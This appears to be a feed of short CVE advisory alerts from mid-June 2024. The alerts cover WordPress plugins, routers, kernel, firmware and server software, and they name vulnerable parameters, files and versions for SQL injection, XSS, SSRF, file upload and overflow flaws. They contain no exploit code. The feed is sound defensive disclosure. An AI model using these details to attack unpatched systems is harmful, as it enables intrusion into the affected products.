🚨 CVE-2024-5021The WordPress Picture / Portfolio / Media Gallery plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 3.0.1 via the 'file_get_contents' function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.🎖@cveNotify |
|
| 2024-06-19 04:37:42 |
🚨 CVE-2024-4787The Cost Calculator Builder PRO for WordPress is vulnerable to arbitrary email sending vulnerability in versions up to, and including, 3.1.75. This is due to insufficient limitations on the email recipient and the content in the 'send_pdf' and the 'send_pdf_front' functions which are reachable via AJAX. This makes it possible for unauthenticated attackers to send emails with any content to any recipient.🎖@cveNotify |
|
| 2024-06-19 04:37:41 |
🚨 CVE-2024-4623The Blogmentor – Blog Layouts for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘pagination_style’ parameter in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-19 04:37:37 |
🚨 CVE-2024-4450The AliExpress Dropshipping with AliNext Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several functions in the ImportAjaxController.php file in all versions up to, and including, 3.3.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several actions like importing and modifying products.🎖@cveNotify |
|
| 2024-06-19 04:37:36 |
🚨 CVE-2023-30312An issue discovered in OpenWrt 18.06, 19.07, 21.02, 22.03, and beyond allows off-path attackers to hijack TCP sessions, which could lead to a denial of service, impersonating the client to the server (e.g., for access to files over FTP), and impersonating the server to the client (e.g., to deliver false information from a finance website). This occurs because nf_conntrack_tcp_no_window_check is true by default.🎖@cveNotify |
|
| 2024-06-19 03:37:48 |
🚨 CVE-2024-24789The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create an zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.🎖@cveNotify |
|
| 2024-06-19 03:37:47 |
🚨 CVE-2024-27834The issue was addressed with improved checks. This issue is fixed in iOS 17.5 and iPadOS 17.5, tvOS 17.5, Safari 17.5, watchOS 10.5, macOS Sonoma 14.5. An attacker with arbitrary read and write capability may be able to bypass Pointer Authentication.🎖@cveNotify |
|
| 2024-06-19 02:37:47 |
🚨 CVE-2024-6125The Login with phone number plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 1.7.34. This is due to the plugin generating too weak a reset code, and the code used to reset the password has no attempt or time limit. This makes it possible for unauthenticated attackers to reset the password of arbitrary users by guessing a 6-digit numeric reset code.🎖@cveNotify |
|
| 2024-06-19 00:37:33 |
🚨 CVE-2024-6144Actiontec WCB6200Q Multipart Boundary Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Actiontec WCB6200Q routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the HTTP server. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the HTTP server. Was ZDI-CAN-21416.🎖@cveNotify |
|
| 2024-06-19 00:37:32 |
🚨 CVE-2024-6142Actiontec WCB6200Q uh_tcp_recv_content Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of Actiontec WCB6200Q routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the HTTP server. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length buffer. An attacker can leverage this vulnerability to execute code in the context of the HTTP server. Was ZDI-CAN-21410.🎖@cveNotify |
|
| 2024-06-18 22:37:24 |
🚨 CVE-2024-5970The MaxGalleria plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's maxgallery_thumb shortcode in all versions up to, and including, 6.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-18 21:37:38 |
🚨 CVE-2024-6129A vulnerability, which was classified as problematic, was found in spa-cartcms 1.9.0.6. Affected is an unknown function of the file /login of the component Username Handler. The manipulation of the argument email leads to observable behavioral discrepancy. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268896.🎖@cveNotify |
|
| 2024-06-18 21:37:37 |
🚨 CVE-2024-6128A vulnerability, which was classified as problematic, has been found in spa-cartcms 1.9.0.6. This issue affects some unknown processing of the file /checkout of the component Checkout Page. The manipulation of the argument quantity with the input -10 leads to enforcement of behavioral workflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268895.🎖@cveNotify |
|
| 2024-06-18 21:37:35 |
🚨 CVE-2019-19049A memory leak in the unittest_data_add() function in drivers/of/unittest.c in the Linux kernel before 5.3.10 allows attackers to cause a denial of service (memory consumption) by triggering of_fdt_unflatten_tree() failures, aka CID-e13de8fe0d6a. NOTE: third parties dispute the relevance of this because unittest.c can only be reached during boot🎖@cveNotify |
|
| 2024-06-18 21:37:34 |
🚨 CVE-2019-17263In libyal libfwsi before 20191006, libfwsi_extension_block_copy_from_byte_stream in libfwsi_extension_block.c has a heap-based buffer over-read because rejection of an unsupported size only considers values less than 6, even though values of 6 and 7 are also unsupported. NOTE: the vendor has disputed this as described in the GitHub issue🎖@cveNotify |
|
| 2024-06-18 21:37:32 |
🚨 CVE-2019-15045AjaxDomainServlet in Zoho ManageEngine ServiceDesk Plus 10 allows User Enumeration. NOTE: the vendor's position is that this is intended functionality🎖@cveNotify |
|
| 2024-06-18 21:37:31 |
🚨 CVE-2019-9228An issue was discovered on AudioCodes Mediant 500L-MSBR, 500-MBSR, M800B-MSBR and 800C-MSBR devices with firmware versions F7.20A at least to 7.20A.252.062. The (1) management SSH and (2) management TELNET features allow remote attackers to cause a denial of service (connection slot exhaustion) via 5 unauthenticated connection attempts, because the maximum number of unauthenticated clients that can be configured is 5. NOTE: the vendor's position is that this is a "design choice.🎖@cveNotify |
|
| 2024-06-18 21:37:29 |
🚨 CVE-2019-12454An issue was discovered in wcd9335_codec_enable_dec in sound/soc/codecs/wcd9335.c in the Linux kernel through 5.1.5. It uses kstrndup instead of kmemdup_nul, which allows attackers to have an unspecified impact via unknown vectors. NOTE: The vendor disputes this issues as not being a vulnerability because switching to kmemdup_nul() would only fix a security issue if the source string wasn't NUL-terminated, which is not the case🎖@cveNotify |
|
| 2024-06-18 21:37:27 |
🚨 CVE-2019-12087Samsung S9+, S10, and XCover 4 P(9.0) devices can become temporarily inoperable because of an unprotected intent in the ContainerAgent application. For example, the victim becomes stuck in a launcher with their Secure Folder locked. NOTE: the researcher mentions "the Samsung Security Team considered this issue as no/little security impact.🎖@cveNotify |
|
| 2024-06-18 21:37:26 |
🚨 CVE-2018-16259There is an XSS vulnerability in WP All Import plugin 3.4.9 for WordPress via pmxi-admin-settings large_feed_limit. NOTE: The vendor states that this is not a vulnerability. WP All Import is only able to be used by a logged in administrator, and the action described can only be taken advantage of by a logged in administrator🎖@cveNotify |
|
| 2024-06-18 20:37:24 |
🚨 CVE-2018-7447mojoPortal through 2.6.0.0 is prone to multiple persistent cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. The 'Title' and 'Subtitle' fields of the 'Blog' page are vulnerable. NOTE: The software maintainer disputes this as a vulnerability because the fields claimed to be vulnerable to XSS are only available to administrators who are supposed to have access to add scripts🎖@cveNotify |
|
| 2024-06-18 19:37:44 |
🚨 CVE-2024-34987A SQL Injection vulnerability exists in the `ofrs/admin/index.php` script of PHPGurukul Online Fire Reporting System 1.2. The vulnerability allows attackers to bypass authentication and gain unauthorized access by injecting SQL commands into the username input field during the login process.🎖@cveNotify |
|
| 2024-06-18 19:37:43 |
🚨 CVE-2023-20566Improper address validation in ASP with SNP enabled may potentially allow an attacker to compromise guest memory integrity.🎖@cveNotify |
|
| 2024-06-18 19:37:42 |
🚨 CVE-2023-20526Insufficient input validation in the ASP Bootloader may enable a privileged attacker with physical access to expose the contents of ASP memory potentially leading to a loss of confidentiality.🎖@cveNotify |
|
| 2024-06-18 19:37:38 |
🚨 CVE-2022-23830SMM configuration may not be immutable, as intended, when SNP is enabled resulting in a potential limited loss of guest memory integrity.🎖@cveNotify |
|
| 2024-06-18 19:37:37 |
🚨 CVE-2021-46774Insufficient DRAM address validation in SystemManagement Unit (SMU) may allow an attacker to read/write from/to an invalidDRAM address, potentially resulting in denial-of-service.🎖@cveNotify |
|
| 2024-06-18 19:37:36 |
🚨 CVE-2021-46766Improper clearing of sensitive data in the ASP Bootloader may expose secret keys to a privileged attacker accessing ASP SRAM, potentially leading to a loss of confidentiality.🎖@cveNotify |
|
| 2024-06-18 19:37:32 |
🚨 CVE-2021-46762Insufficient input validation in the SMU mayallow an attacker to corrupt SMU SRAM potentially leading to a loss ofintegrity or denial of service.🎖@cveNotify |
|
| 2024-06-18 19:37:31 |
🚨 CVE-2017-14953HikVision Wi-Fi IP cameras, when used in a wired configuration, allow physically proximate attackers to trigger association with an arbitrary access point by leveraging a default SSID with no WiFi encryption or authentication. NOTE: Vendor states that this is not a vulnerability, but more an increase to the attack surface of the product🎖@cveNotify |
|
| 2024-06-18 19:37:30 |
🚨 CVE-2017-9861An issue was discovered in SMA Solar Technology products. The SIP implementation does not properly use authentication with encryption: it is vulnerable to replay attacks, packet injection attacks, and man in the middle attacks. An attacker is able to successfully use SIP to communicate with the device from anywhere within the LAN. An attacker may use this to crash the device, stop it from communicating with the SMA servers, exploit known SIP vulnerabilities, or find sensitive information from the SIP communications. Furthermore, because the SIP communication channel is unencrypted, an attacker capable of understanding the protocol can eavesdrop on communications. For example, passwords can be extracted. NOTE: the vendor's position is that authentication with encryption is not required on an isolated subnetwork. Also, only Sunny Boy TLST-21 and TL-21 and Sunny Tripower TL-10 and TL-30 could potentially be affected🎖@cveNotify |
|
| 2024-06-18 19:37:27 |
🚨 CVE-2017-9851An issue was discovered in SMA Solar Technology products. By sending nonsense data or setting up a TELNET session to the database port of Sunny Explorer, the application can be crashed. NOTE: the vendor reports that the maximum possible damage is a communication failure. Also, only Sunny Boy TLST-21 and TL-21 and Sunny Tripower TL-10 and TL-30 could potentially be affected🎖@cveNotify |
|
| 2024-06-18 19:37:26 |
🚨 CVE-2013-7030The TFTP service in Cisco Unified Communications Manager (aka CUCM or Unified CM) allows remote attackers to obtain sensitive information from a phone via an RRQ operation, as demonstrated by discovering a cleartext UseUserCredential field in an SPDefault.cnf.xml file. NOTE: the vendor reportedly disputes the significance of this report, stating that this is an expected default behavior, and that the product's documentation describes use of the TFTP Encrypted Config option in addressing this issue🎖@cveNotify |
|
| 2024-06-18 19:37:25 |
🚨 CVE-2012-2212McAfee Web Gateway 7.0 allows remote attackers to bypass the access configuration for the CONNECT method by providing an arbitrary allowed hostname in the Host HTTP header. NOTE: this issue might not be reproducible, because the researcher did not provide configuration details for the vulnerable system, and the observed behavior might be consistent with a configuration that was (perhaps inadvertently) designed to allow access based on Host HTTP headers🎖@cveNotify |
|
| 2024-06-18 19:07:26 |
🚨 CVE-2024-4812A flaw was found in the Katello plugin for Foreman, where it is possible to store malicious JavaScript code in the "Description" field of a user. This code can be executed when opening certain pages, for example, Host Collections.🎖@cveNotify |
|
| 2024-06-18 19:07:25 |
🚨 CVE-2024-36837SQL Injection vulnerability in CRMEB v.5.2.2 allows a remote attacker to obtain sensitive information via the getProductList function in the ProductController.php file.🎖@cveNotify |
|
| 2024-06-18 18:37:25 |
🚨 CVE-2024-35674Missing Authorization vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates).This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.109.🎖@cveNotify |
|
| 2024-06-18 18:37:24 |
🚨 CVE-2024-5629An out-of-bounds read in the 'bson' module of PyMongo 4.6.2 or earlier allows deserialization of malformed BSON provided by a Server to raise an exception which may contain arbitrary application memory.🎖@cveNotify |
|
| 2024-06-18 18:07:30 |
🚨 CVE-2024-20405A vulnerability in the web-based management interface of Cisco Finesse could allow an unauthenticated, remote attacker to conduct a stored XSS attack by exploiting an RFI vulnerability. This vulnerability is due to insufficient validation of user-supplied input for specific HTTP requests that are sent to an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive information on the affected device.🎖@cveNotify |
|
| 2024-06-18 18:07:29 |
🚨 CVE-2024-24790The various Is methods (IsPrivate, IsLoopback, etc) did not work as expected for IPv4-mapped IPv6 addresses, returning false for addresses which would return true in their traditional IPv4 forms.🎖@cveNotify |
|
| 2024-06-18 18:07:27 |
🚨 CVE-2024-24789The archive/zip package's handling of certain types of invalid zip files differs from the behavior of most zip implementations. This misalignment could be exploited to create an zip file with contents that vary depending on the implementation reading the file. The archive/zip package now rejects files containing these errors.🎖@cveNotify |
|
| 2024-06-18 17:37:32 |
🚨 CVE-2024-38351Pocketbase is an open source web backend written in go. In affected versions a malicious user may be able to compromise other user accounts. In order to be exploited users must have both OAuth2 and Password auth methods enabled. A possible attack scenario could be: 1. a malicious actor register with the targeted user's email (it is unverified), 2. at some later point in time the targeted user stumble on your app and decides to sign-up with OAuth2 (_this step could be also initiated by the attacker by sending an invite email to the targeted user_), 3. on successful OAuth2 auth we search for an existing PocketBase user matching with the OAuth2 user's email and associate them, 4. because we haven't changed the password of the existing PocketBase user during the linking, the malicious actor has access to the targeted user account and will be able to login with the initially created email/password. To prevent this for happening we now reset the password for this specific case if the previously created user wasn't verified (an exception to this is if the linking is explicit/manual, aka. when you send `Authorization:TOKEN` with the OAuth2 auth call). Additionally to warn existing users we now send an email alert in case the user has logged in with password but has at least one OAuth2 account linked. The flow will be further improved with ongoing refactoring and we will start sending emails for "unrecognized device" logins (OTP and MFA is already implemented and will be available with the next v0.23.0 release in the near future). For the time being users are advised to update to version 0.22.14. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-06-18 17:37:31 |
🚨 CVE-2024-38348CodeProjects Health Care hospital Management System v1.0 was discovered to contain a SQL injection vulnerability in the Staff Info module via the searvalu parameter.🎖@cveNotify |
|
| 2024-06-18 17:37:30 |
🚨 CVE-2024-37803Multiple stored cross-site scripting (XSS) vulnerabilities in CodeProjects Health Care hospital Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname and lname parameters under the Staff Info page.🎖@cveNotify |
|
| 2024-06-18 17:37:26 |
🚨 CVE-2024-37802CodeProjects Health Care hospital Management System v1.0 was discovered to contain a SQL injection vulnerability in the Patient Info module via the searvalu parameter.🎖@cveNotify |
|
| 2024-06-18 17:37:25 |
🚨 CVE-2024-21685This High severity Information Disclosure vulnerability was introduced in versions 9.4.0, 9.12.0, and 9.15.0 of Jira Core Data Center. This Information Disclosure vulnerability, with a CVSS Score of 7.4, allows an unauthenticated attacker to view sensitive information via an Information Disclosure vulnerability which has high impact to confidentiality, no impact to integrity, no impact to availability, and requires user interaction. Atlassian recommends that Jira Core Data Center customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Jira Core Data Center 9.4: Upgrade to a release greater than or equal to 9.4.21 Jira Core Data Center 9.12: Upgrade to a release greater than or equal to 9.12.8 Jira Core Data Center 9.16: Upgrade to a release greater than or equal to 9.16.0 See the release notes. You can download the latest version of Jira Core Data Center from the download center. This vulnerability was found internally.🎖@cveNotify |
|
| 2024-06-18 17:37:24 |
🚨 CVE-2024-36129The OpenTelemetry Collector offers a vendor-agnostic implementation on how to receive, process and export telemetry data. An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption. OTel Collector version 0.102.1 fixes this issue. It is also fixed in the confighttp module version 0.102.0 and configgrpc module version 0.102.1.🎖@cveNotify |
|
| 2024-06-18 17:07:26 |
🚨 CVE-2024-5037A flaw was found in OpenShift's Telemeter. If certain conditions are in place, an attacker can use a forged token to bypass the issue ("iss") check during JSON web token (JWT) authentication.🎖@cveNotify |
|
| 2024-06-18 17:07:25 |
🚨 CVE-2024-4009Replay Attackin ABB, Busch-Jaeger, FTS Display (version 1.00) and BCU (version 1.3.0.33) allows attacker to capture/replay KNX telegram to local KNX Bus-System🎖@cveNotify |
|
| 2024-06-18 17:07:24 |
🚨 CVE-2024-4008FDSK Leak in ABB, Busch-Jaeger, FTS Display (version 1.00) and BCU (version 1.3.0.33) allows attacker to take control via access to local KNX Bus-System🎖@cveNotify |
|
| 2024-06-18 16:37:26 |
🚨 CVE-2024-6058A vulnerability classified as problematic has been found in LabVantage LIMS 2017. This affects an unknown part of the file /labvantage/rc?command=page&page=SampleHistoricalList&_iframename=list&__crc=crc_1701669816260. The manipulation of the argument height/width leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268785 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-18 16:37:25 |
🚨 CVE-2020-36599lib/omniauth/failure_endpoint.rb in OmniAuth before 1.9.2 (and before 2.0) does not escape the message_key value.🎖@cveNotify |
|
| 2024-06-18 16:37:24 |
🚨 CVE-2019-8354An issue was discovered in SoX 14.4.2. lsx_make_lpf in effect_i_dsp.c has an integer overflow on the result of multiplication fed into malloc. When the buffer is allocated, it is smaller than expected, leading to a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-06-18 16:07:56 |
🚨 CVE-2023-49928An issue was discovered in Samsung Mobile Processor, Automotive Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123. The baseband software does not properly check states specified by the RRC. This can lead to disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-18 16:07:55 |
🚨 CVE-2023-49927An issue was discovered in Samsung Mobile Processor, Automotive Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 2200, 1280, 1380, 1330, 9110, W920, Exynos Modem 5123, Exynos Modem 5300, and Exynos Auto T5123. The baseband software does not properly check format types specified by the RRC. This can lead to a lack of encryption.🎖@cveNotify |
|
| 2024-06-18 15:37:53 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation.🎖@cveNotify |
|
| 2024-06-18 15:37:52 |
🚨 CVE-2023-5157A vulnerability was found in MariaDB. An OpenVAS port scan on ports 3306 and 4567 allows a malicious remote client to cause a denial of service.🎖@cveNotify |
|
| 2024-06-18 15:37:51 |
🚨 CVE-2023-38430An issue was discovered in the Linux kernel before 6.3.9. ksmbd does not validate the SMB request protocol ID, leading to an out-of-bounds read.🎖@cveNotify |
|
| 2024-06-18 14:07:24 |
🚨 CVE-2022-30332In Talend Administration Center 7.3.1.20200219 before TAC-15950, the Forgot Password feature provides different error messages for invalid reset attempts depending on whether the email address is associated with any account. This allows remote attackers to enumerate accounts via a series of requests.🎖@cveNotify |
|
| 2024-06-18 13:37:35 |
🚨 CVE-2024-6115A vulnerability classified as critical was found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file add_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268867.🎖@cveNotify |
|
| 2024-06-18 13:37:34 |
🚨 CVE-2024-6114A vulnerability classified as critical has been found in itsourcecode Monbela Tourist Inn Online Reservation System up to 1.0. Affected is an unknown function of the file controller.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268866 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-18 13:37:33 |
🚨 CVE-2024-6111A vulnerability classified as critical has been found in itsourcecode Pool of Bethesda Online Reservation System 1.0. This affects an unknown part of the file login.php. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268857 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-18 13:37:29 |
🚨 CVE-2024-1577Remote Code Execution vulnerability in MegaBIP software allows to execute arbitrary code on the server without requiring authentication by saving crafted by the attacker PHP code to one of the website files. This issue affects MegaBIP software versions through 5.11.2.🎖@cveNotify |
|
| 2024-06-18 13:37:28 |
🚨 CVE-2024-3049A flaw was found in Booth, a cluster ticket manager. If a specially-crafted hash is passed to gcry_md_get_algo_dlen(), it may allow an invalid HMAC to be accepted by the Booth server.🎖@cveNotify |
|
| 2024-06-18 13:37:27 |
🚨 CVE-2024-0570A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-18 13:37:26 |
🚨 CVE-2024-0569A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-18 12:38:01 |
🚨 CVE-2024-6109A vulnerability was found in itsourcecode Tailoring Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file addmeasurement.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268855.🎖@cveNotify |
|
| 2024-06-18 12:38:00 |
🚨 CVE-2024-1132A flaw was found in Keycloak, where it does not properly validate URLs included in a redirect. This issue could allow an attacker to construct a malicious request to bypass validation and access other URLs and sensitive information within the domain or conduct further attacks. This flaw affects any client that utilizes a wildcard in the Valid Redirect URIs field, and requires user interaction within the malicious URL.🎖@cveNotify |
|
| 2024-06-18 10:37:35 |
🚨 CVE-2024-5953A denial of service vulnerability was found in the 389-ds-base LDAP server. This issue may allow an authenticated user to cause a server denial of service while attempting to log in with a user with a malformed hash in their password.🎖@cveNotify |
|
| 2024-06-18 10:37:34 |
🚨 CVE-2024-5458In PHP versions 8.1.* before 8.1.29, 8.2.* before 8.2.20, 8.3.* before 8.3.8, due to a code logic error, filtering functions such as filter_var when validating URLs (FILTER_VALIDATE_URL) for certain types of URLs the function will result in invalid user information (username + password part of URLs) being treated as valid user information. This may lead to the downstream code accepting invalid URLs as valid and parsing them incorrectly.🎖@cveNotify |
|
| 2024-06-18 10:37:33 |
🚨 CVE-2023-5123The JSON datasource plugin ( https://grafana.com/grafana/plugins/marcusolsson-json-datasource/ ) is a Grafana Labs maintained plugin for Grafana that allows for retrieving and processing JSON data from a remote endpoint (including a specific sub-path) configured by an administrator. Due to inadequate sanitization of the dashboard-supplied path parameter, it was possible to include path traversal characters (../) in the path parameter and send requests to paths on the configured endpoint outside the configured sub-path. This means that if the datasource was configured by an administrator to point at some sub-path of a domain (e.g. https://example.com/api/some_safe_api/ ), it was possible for an editor to create a dashboard referencing the datasource which issues queries containing path traversal characters, which would in turn cause the datasource to instead query arbitrary subpaths on the configured domain (e.g. https://example.com/api/admin_api/) .In the rare case that this plugin is configured by an administrator to point back at the Grafana instance itself, this vulnerability becomes considerably more severe, as an administrator browsing a maliciously configured panel could be compelled to make requests to Grafana administrative API endpoints with their credentials, resulting in the potential for privilege escalation, hence the high score for this vulnerability.🎖@cveNotify |
|
| 2024-06-18 09:37:54 |
🚨 CVE-2024-5899When Bazel Plugin in intellij imports a project (either using "import project" or "Auto import") the dialog for trusting the project is not displayed. This comes from the fact that both call the method ProjectBuilder.createProject which then calls ProjectManager.getInstance().createProject. This method, as its name suggests is intended to create a new project, not to import an existing one. We recommend upgrading to version 2024.06.04.0.2 or beyond for the IntelliJ, CLion and Android Studio Bazel plugins.🎖@cveNotify |
|
| 2024-06-18 08:37:40 |
🚨 CVE-2024-5533The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 4.25.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-18 06:37:35 |
🚨 CVE-2024-5172The Expert Invoice WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-18 06:37:31 |
🚨 CVE-2024-37081The vCenter Server contains multiple local privilege escalation vulnerabilities due to misconfiguration of sudo. An authenticated local user with non-administrative privileges may exploit these issues to elevate privileges to root on vCenter Server Appliance.🎖@cveNotify |
|
| 2024-06-18 06:37:30 |
🚨 CVE-2024-37079vCenter Server contains a heap-overflow vulnerability in the implementation of the DCERPC protocol. A malicious actor with network access to vCenter Server may trigger this vulnerability by sending a specially crafted network packet potentially leading to remote code execution.🎖@cveNotify |
|
| 2024-06-18 06:37:26 |
🚨 CVE-2024-33622Missing authentication for critical function vulnerability exists in ID Link Manager and FUJITSU Software TIME CREATOR. If this vulnerability is exploited, sensitive information may be obtained and/or the information stored in the database may be altered by a remote authenticated attacker.🎖@cveNotify |
|
| 2024-06-18 06:37:25 |
🚨 CVE-2024-0066Johan Fagerström, member of the AXIS OS Bug Bounty Program, has found that a O3C feature may expose sensitive traffic between the client (Axis device) and (O3C) server. If O3C is not being used this flaw does not apply. Axis has released patched AXIS OS versions for the highlighted flaw. Please refer to the Axis security advisory for more information and solution.🎖@cveNotify |
|
| 2024-06-18 06:37:24 |
🚨 CVE-2023-5527The Business Directory Plugin plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 6.4.3 via the class-csv-exporter.php file. This allows authenticated attackers, with author-level permissions and above, to embed untrusted input into CSV files exported by administrators, which can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.🎖@cveNotify |
|
| 2024-06-18 05:37:24 |
🚨 CVE-2024-6084A vulnerability has been found in itsourcecode Pool of Bethesda Online Reservation System up to 1.0 and classified as critical. Affected by this vulnerability is the function uploadImage of the file /admin/mod_room/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268825 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-18 04:37:24 |
🚨 CVE-2024-5860The Tickera – WordPress Event Ticketing plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tc_dl_delete_tickets AJAX action in all versions up to, and including, 3.5.2.8. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete all tickets associated with events.🎖@cveNotify |
|
| 2024-06-18 03:37:42 |
🚨 CVE-2024-5541The Ibtana – WordPress Website Builder plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ibtana_visual_editor_register_ajax_json_endpont' function in all versions up to, and including, 1.2.3.3. This makes it possible for unauthenticated attackers to update option values for reCAPTCHA keys on the WordPress site. This can be leveraged to bypass reCAPTCHA on the site.🎖@cveNotify |
|
| 2024-06-18 03:37:41 |
🚨 CVE-2024-0845The PDF Viewer for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the render function in all versions up to, and including, 2.9.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-18 02:37:24 |
🚨 CVE-2024-21096Vulnerability in the MySQL Server product of Oracle MySQL (component: Client: mysqldump). Supported versions that are affected are 8.0.36 and prior and 8.3.0 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L).🎖@cveNotify |
|
| 2024-06-18 01:37:34 |
🚨 CVE-2024-6084A vulnerability has been found in itsourcecode Pool of Bethesda Online Reservation System up to 1.0 and classified as critical. Affected by this vulnerability is the function uploadImage of the file /admin/mod_room/controller.php?action=add. The manipulation of the argument image leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-268825 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-18 00:37:24 |
🚨 CVE-2024-6083A vulnerability, which was classified as critical, was found in PHPVibe 11.0.46. Affected is an unknown function of the file /app/uploading/upload-mp3.php of the component Media Upload Page. The manipulation of the argument file leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-268824. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-17 23:37:25 |
